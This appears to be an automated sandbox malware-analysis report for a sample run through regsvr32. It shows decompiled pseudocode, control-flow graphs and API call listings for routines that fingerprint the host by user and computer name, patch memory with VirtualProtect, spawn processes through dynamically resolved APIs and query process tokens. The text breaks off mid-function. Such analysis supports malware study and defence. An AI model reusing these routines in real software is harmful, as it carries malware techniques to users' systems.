                control_flow_graph 251 31f5f8b-31f5f9f 252 31f5fa9-31f5fbb call 31f7452 251->252 253 31f5fa1-31f5fa6 251->253 256 31f600f-31f601c 252->256 257 31f5fbd-31f5fcd GetUserNameW 252->257 253->252 259 31f601e-31f6035 GetComputerNameW 256->259 258 31f5fcf-31f5fdf RtlAllocateHeap 257->258 257->259 258->259 260 31f5fe1-31f5fee GetUserNameW 258->260 261 31f6037-31f6048 RtlAllocateHeap 259->261 262 31f6073-31f6095 259->262 263 31f5ffe-31f600d 260->263 264 31f5ff0-31f5ffc call 31f6576 260->264 261->262 265 31f604a-31f6053 GetComputerNameW 261->265 263->259 264->263 267 31f6055-31f6061 call 31f6576 265->267 268 31f6064-31f6067 265->268 267->268 268->262
                C-Code - Quality: 96%
                			E031F5F8B(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x31fa2c8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E031F7452( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x31fa2d4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x31fa290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E031F6576(_v8 + _v8, _t63);
							}
							HeapFree( *0x31fa290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x31fa290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E031F6576(_v8 + _v8, _t63);
						}
						HeapFree( *0x31fa290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                0x031f5f8b
                0x031f5f93
                0x031f5f99
                0x031f5f9c
                0x031f5f9f
                0x031f5fa1
                0x031f5fa6
                0x031f5fa6
                0x031f5fac
                0x031f5fae
                0x031f5fbb
                0x031f601c
                0x031f5fbd
                0x031f5fc2
                0x031f5fc8
                0x031f5fcd
                0x031f5fdb
                0x031f5fdf
                0x031f5fee
                0x031f5ff5
                0x031f5ffc
                0x031f5ffc
                0x031f6007
                0x031f6007
                0x031f5fdf
                0x031f5fcd
                0x031f601e
                0x031f6024
                0x031f602e
                0x031f6030
                0x031f6035
                0x031f6044
                0x031f6048
                0x031f6053
                0x031f605a
                0x031f6061
                0x031f6061
                0x031f606d
                0x031f606d
                0x031f6048
                0x031f6076
                0x031f6078
                0x031f607b
                0x031f607d
                0x031f6080
                0x031f6083
                0x031f608d
                0x031f6091
                0x031f6095

                APIs
                • GetUserNameW.ADVAPI32(00000000,?), ref: 031F5FC2
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 031F5FD9
                • GetUserNameW.ADVAPI32(00000000,?), ref: 031F5FE6
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F6007
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 031F602E
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 031F6042
                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 031F604F
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F606D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: HeapName$AllocateComputerFreeUser
                • String ID: Ut
                • API String ID: 3239747167-8415677
                • Opcode ID: 3f88197ea2915cca44ce3b6282d152352283284cbd2b60b4e143911c173344de
                • Instruction ID: 18f2cdab9594fc3fd4d892741742c64bd5331e531b80b152a1d665fbe5a2fbfb
                • Opcode Fuzzy Hash: 3f88197ea2915cca44ce3b6282d152352283284cbd2b60b4e143911c173344de
                • Instruction Fuzzy Hash: 1D313A71A00209EFDB15EFA9DD80AAEB7F9FF4C200F244069E609D3250D735EA509B20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE0B4D Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 273 4be0b4d-4be0b6e call 4be730c 276 4be0c4e 273->276 277 4be0b74-4be0b75 273->277 278 4be0c54-4be0c63 VirtualProtect 276->278 279 4be0bda-4be0be1 277->279 280 4be0b77-4be0b7a 277->280 283 4be0c65-4be0c7b VirtualProtect 278->283 284 4be0c80-4be0c86 GetLastError 278->284 281 4be0be3-4be0be9 279->281 282 4be0c21-4be0c36 VirtualProtect 279->282 285 4be0ca5-4be0cb1 call 4be7347 280->285 286 4be0b80 280->286 281->282 287 4be0beb-4be0bf7 281->287 282->278 288 4be0c38-4be0c4c 282->288 289 4be0b86-4be0b8c 283->289 284->285 286->289 287->278 294 4be0bf9-4be0c06 VirtualProtect 287->294 295 4be0c1d-4be0c1f VirtualProtect 288->295 291 4be0bce-4be0bd5 289->291 292 4be0b8e-4be0b92 289->292 291->285 292->291 296 4be0b94-4be0bb0 lstrlen VirtualProtect 292->296 294->278 297 4be0c08-4be0c1c 294->297 295->278 296->291 298 4be0bb2-4be0bcc lstrcpy VirtualProtect 296->298 297->295 298->291
                APIs
                • lstrlen.KERNEL32(?,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BE0B9A
                • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0BAC
                • lstrcpy.KERNEL32(00000000,?), ref: 04BE0BBB
                • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0BCC
                • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,04BEA510,00000018,04BE5756,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000), ref: 04BE0C02
                • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0C1D
                • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,04BEA510,00000018,04BE5756,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000), ref: 04BE0C32
                • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,04BEA510,00000018,04BE5756,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000), ref: 04BE0C5F
                • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0C79
                • GetLastError.KERNEL32(?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BE0C80
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                • String ID:
                • API String ID: 3676034644-0
                • Opcode ID: 09a70ce9b572ca27c5fde267aa9d4b44562d1f7417f3a9a146cd0b04749fd9b4
                • Instruction ID: 6df0a759e5ce1bfad19336501a5dea07a207b913a4f3640a7eab7a793b05e122
                • Opcode Fuzzy Hash: 09a70ce9b572ca27c5fde267aa9d4b44562d1f7417f3a9a146cd0b04749fd9b4
                • Instruction Fuzzy Hash: 36414171A00B09DFDB21AFA6CC44EBAB7B8FB88314F008555E656A76A0D774F805DF20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F1212 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109librarymemoryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 299 31f1212-31f1235 call 31f21fa 302 31f123b-31f1254 call 31f7a9c call 4bd6fb0 299->302 303 31f1342-31f1349 299->303 307 31f125a-31f1261 302->307 308 31f1330-31f133d call 31f2c11 302->308 307->308 309 31f1267-31f1299 memset call 31f6ee4 307->309 308->303 313 31f129f-31f12c3 GetModuleHandleA GetProcAddress 309->313 314 31f1329 309->314 316 31f12c5-31f12e5 call 31f6cfd 313->316 317 31f1312 313->317 314->308 329 31f12e6 call 4bc380b 316->329 330 31f12e6 call 4bcfdc6 316->330 331 31f12e6 call 4bc6552 316->331 319 31f1319-31f1327 317->319 319->308 323 31f12e8-31f12f3 call 31f6cfd 326 31f1307-31f1310 GetLastError 323->326 327 31f12f5-31f1305 CloseHandle * 2 323->327 326->319 327->319 329->323 330->323 331->323
                C-Code - Quality: 73%
                			E031F1212(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E031F21FA(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E031F7A9C( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x31fa2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x31fa2d8; // 0x240d5a8
					_t18 = _t47 + 0x31fb3b3; // 0x73797325
					_t68 = E031F6EE4(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x31fa2d8; // 0x240d5a8
						_t19 = _t50 + 0x31fb760; // 0x5608d08
						_t20 = _t50 + 0x31fb0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E031F6CFD();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
							_push(1);
							E031F6CFD();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x31fa290, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E031F2C11(_t70);
				goto L12;
			}


















                0x031f121a
                0x031f121a
                0x031f1229
                0x031f1232
                0x031f1235
                0x031f1342
                0x031f1349
                0x031f1349
                0x031f1244
                0x031f124c
                0x031f1251
                0x031f1254
                0x031f1269
                0x031f126f
                0x031f1270
                0x031f1273
                0x031f1279
                0x031f127c
                0x031f1281
                0x031f1289
                0x031f1295
                0x031f1299
                0x031f1329
                0x031f129f
                0x031f129f
                0x031f12a4
                0x031f12ab
                0x031f12bf
                0x031f12c3
                0x031f1312
                0x031f12c5
                0x031f12c6
                0x031f12cd
                0x031f12e6
                0x031f12e8
                0x031f12ec
                0x031f12f3
                0x031f130d
                0x031f12f5
                0x031f12fe
                0x031f1303
                0x031f1303
                0x031f12f3
                0x031f1321
                0x031f1321
                0x031f1299
                0x031f1330
                0x031f1339
                0x031f133d
                0x00000000

                APIs
                  • Part of subcall function 031F21FA: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,031F122E,?,?,?,?,00000000,00000000), ref: 031F221F
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,7243775A), ref: 031F2241
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,614D775A), ref: 031F2257
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 031F226D
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 031F2283
                  • Part of subcall function 031F21FA: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 031F2299
                • memset.NTDLL ref: 031F127C
                  • Part of subcall function 031F6EE4: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,031F1295,73797325), ref: 031F6EF5
                  • Part of subcall function 031F6EE4: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 031F6F0F
                • GetModuleHandleA.KERNEL32(4E52454B,05608D08,73797325), ref: 031F12B2
                • GetProcAddress.KERNEL32(00000000), ref: 031F12B9
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F1321
                  • Part of subcall function 031F6CFD: GetProcAddress.KERNEL32(36776F57,031F60F7), ref: 031F6D18
                • CloseHandle.KERNEL32(00000000,00000001), ref: 031F12FE
                • CloseHandle.KERNEL32(?), ref: 031F1303
                • GetLastError.KERNEL32(00000001), ref: 031F1307
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                • String ID: Ut
                • API String ID: 3075724336-8415677
                • Opcode ID: 43f316231464f2ec7ee24ee11f328feb3a5194774b9ffcbe6984347eea943d07
                • Instruction ID: d4aa9ca85178933167ba19d17d49e5280a8e61d0c4f0f72524c79f245eb59ee4
                • Opcode Fuzzy Hash: 43f316231464f2ec7ee24ee11f328feb3a5194774b9ffcbe6984347eea943d07
                • Instruction Fuzzy Hash: 7E312A76900208FFDB14EFA4DC88E9EBBBCEF0C354F144569EA0AE7511D735A9858B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F30FD Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 74%
                			E031F30FD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L031F8076();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x31fa2d8; // 0x240d5a8
				_t5 = _t13 + 0x31fb876; // 0x5608e1e
				_t6 = _t13 + 0x31fb59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L031F7D5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x31fa304, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                0x031f30fd
                0x031f3105
                0x031f3109
                0x031f310f
                0x031f3114
                0x031f3119
                0x031f311c
                0x031f311f
                0x031f3124
                0x031f3125
                0x031f3128
                0x031f312d
                0x031f3134
                0x031f313e
                0x031f3140
                0x031f3141
                0x031f3144
                0x031f3160
                0x031f3166
                0x031f316a
                0x031f31b8
                0x031f316c
                0x031f3179
                0x031f3189
                0x031f3191
                0x031f31a3
                0x031f31a7
                0x00000000
                0x00000000
                0x031f3193
                0x031f3196
                0x031f319b
                0x031f319d
                0x031f319d
                0x031f317b
                0x031f317d
                0x031f31a9
                0x031f31aa
                0x031f31aa
                0x031f3179
                0x031f31bf

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,031F3530,?,?,4D283A53,?,?), ref: 031F3109
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 031F311F
                • _snwprintf.NTDLL ref: 031F3144
                • CreateFileMappingW.KERNELBASE(000000FF,031FA304,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 031F3160
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,031F3530,?,?,4D283A53,?), ref: 031F3172
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 031F3189
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,031F3530,?,?,4D283A53), ref: 031F31AA
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,031F3530,?,?,4D283A53,?), ref: 031F31B2
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: 2891b9e3fadfaaeb1db9e31703e7bbe41b35e558b0d5b828c4ca4bcde6eb4631
                • Instruction ID: 0d4430a2b203f028a7f11ae7a6b4fd14b681e2cfa64a30cff455d577824968fb
                • Opcode Fuzzy Hash: 2891b9e3fadfaaeb1db9e31703e7bbe41b35e558b0d5b828c4ca4bcde6eb4631
                • Instruction Fuzzy Hash: 4521C07AA00204BFD719FB68CC05F9E77B9EF8C750F254121FA1AE7290D77095858B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD8CCE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 04BD7254: VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6), ref: 04BD7279
                  • Part of subcall function 04BD7254: GetLastError.KERNEL32(?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BD7281
                  • Part of subcall function 04BD7254: VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F), ref: 04BD7298
                  • Part of subcall function 04BD7254: VirtualProtect.KERNEL32(?,00000000,-2C9B417C,00000004,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7), ref: 04BD72BD
                • GetLastError.KERNEL32(00000000,00000004,00000002,00000000,?,00000000,00000000,04BEA580,0000001C,04BDBB7F,00000002,?,00000001,00000000,04BED514,00000000), ref: 04BD8E27
                  • Part of subcall function 04BD4D6C: lstrlen.KERNEL32(8B000000,04BCB526,?,04BCB526,00000004), ref: 04BD4DA4
                  • Part of subcall function 04BD4D6C: lstrcpy.KERNEL32(00000000,8B000000), ref: 04BD4DBB
                  • Part of subcall function 04BD4D6C: StrChrA.SHLWAPI(00000000,0000002E,?,04BCB526,00000004), ref: 04BD4DC4
                  • Part of subcall function 04BD4D6C: GetModuleHandleA.KERNEL32(00000000,?,04BCB526,00000004), ref: 04BD4DE2
                • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,8B000000,?,00000004,00000000,00000004,00000002,00000000,?), ref: 04BD8DA5
                • VirtualProtect.KERNELBASE(04BCB73B,00000004,00000002,00000002,?,00000004,00000000,00000004,00000002,00000000,?,00000000,00000000,04BEA580,0000001C,04BDBB7F), ref: 04BD8DC0
                • RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD8DE4
                • RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BD8E02
                  • Part of subcall function 04BD7254: SetLastError.KERNEL32(00000000,?,00000000,00000000,016595A8,?,04BCB526,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BD72C6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                • String ID:
                • API String ID: 899430048-3916222277
                • Opcode ID: 5e8a1a1f97a514168e95f2f7b3ae5782d913e55d2b31f1389fe11b65696aec7d
                • Instruction ID: ba07865a0266fa328b0f1618189e65713d085fe294cf4edca87edcb77a22bce1
                • Opcode Fuzzy Hash: 5e8a1a1f97a514168e95f2f7b3ae5782d913e55d2b31f1389fe11b65696aec7d
                • Instruction Fuzzy Hash: 03417271900615EFDB11EF69C844AADFBB4FF48310F14819AE929AB290E734F951CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD4428 Relevance: 10.6, APIs: 7, Instructions: 110memorystringCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 410 4bd4428-4bd4467 call 4bce4dc VirtualAlloc 413 4bd446d-4bd4478 call 4bce4dc 410->413 414 4bd4538 410->414 419 4bd447d-4bd4483 413->419 416 4bd4540-4bd4542 414->416 417 4bd4544-4bd454c VirtualFree 416->417 418 4bd4552-4bd455d 416->418 417->418 420 4bd44ab-4bd44ad 419->420 421 4bd4485-4bd4489 419->421 420->414 423 4bd44b3-4bd44b7 420->423 421->420 422 4bd448b-4bd44a9 VirtualFree VirtualAlloc 421->422 422->413 422->420 423->414 424 4bd44b9-4bd44c4 423->424 424->416 425 4bd44c6 424->425 426 4bd44cc-4bd44d9 425->426 427 4bd44db-4bd44e4 lstrcmpi 426->427 428 4bd4515-4bd452f 426->428 427->428 429 4bd44e6-4bd44f1 StrChrA 427->429 428->416 430 4bd4531-4bd4536 428->430 431 4bd4501-4bd4511 429->431 432 4bd44f3-4bd44ff lstrcmpi 429->432 430->416 431->426 433 4bd4513 431->433 432->428 432->431 433->416
                APIs
                  • Part of subcall function 04BCE4DC: GetProcAddress.KERNEL32(?,00000318), ref: 04BCE501
                  • Part of subcall function 04BCE4DC: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04BCE51D
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 04BD4461
                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04BD454C
                  • Part of subcall function 04BCE4DC: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04BCE687
                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04BD4497
                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BD44A3
                • lstrcmpi.KERNEL32(?,00000000), ref: 04BD44E0
                • StrChrA.SHLWAPI(?,0000002E), ref: 04BD44E9
                • lstrcmpi.KERNEL32(?,00000000), ref: 04BD44FB
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                • String ID:
                • API String ID: 3901270786-0
                • Opcode ID: 4da3c4b170d46859d980aed3380337926b1f39589672f6ea3fe80433b3fe49c3
                • Instruction ID: 405ad31f2e7d5df1f75732e76ab78fcdefdb27197a38f9acf228e12b389c3a72
                • Opcode Fuzzy Hash: 4da3c4b170d46859d980aed3380337926b1f39589672f6ea3fe80433b3fe49c3
                • Instruction Fuzzy Hash: 1B319271504716ABD321CF15DC45B2BBBE8FF88B58F110A99F9896B240E734F904CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD0EE7 Relevance: 10.6, APIs: 7, Instructions: 84sleepthreadCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 04BCF607: memset.NTDLL ref: 04BCF611
                • OpenEventA.KERNEL32(00000002,00000000,04BEE374,?,00000000,00000000,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64), ref: 04BD0F81
                • SetEvent.KERNEL32(00000000,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD0F8E
                • Sleep.KERNEL32(00000BB8,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD0F99
                • ResetEvent.KERNEL32(00000000,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD0FA0
                • CloseHandle.KERNEL32(00000000,?,04BDE99E,?,?,?,?,?,?,?,04BC8D64,?,?,?,?,?), ref: 04BD0FA7
                • GetShellWindow.USER32 ref: 04BD0FB2
                • GetWindowThreadProcessId.USER32(00000000), ref: 04BD0FB9
                  • Part of subcall function 04BDBB9E: RegCloseKey.ADVAPI32(04BDE99E), ref: 04BDBC21
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                • String ID:
                • API String ID: 53838381-0
                • Opcode ID: f764e18f7e64d6e2d5d63b03b57bf204b5f731b79091f673522df00ef1c35796
                • Instruction ID: 406f7d614bd62b9770810599da3c0d79158023c17369d0896b2ed4a2c219082d
                • Opcode Fuzzy Hash: f764e18f7e64d6e2d5d63b03b57bf204b5f731b79091f673522df00ef1c35796
                • Instruction Fuzzy Hash: 94214132200510ABD2117B67DC88E2B7B6DEBC9754F10C18AF50A9B141EB39FC01DB72
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F5B49 Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F5B49(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x31fa2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E031F2114(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
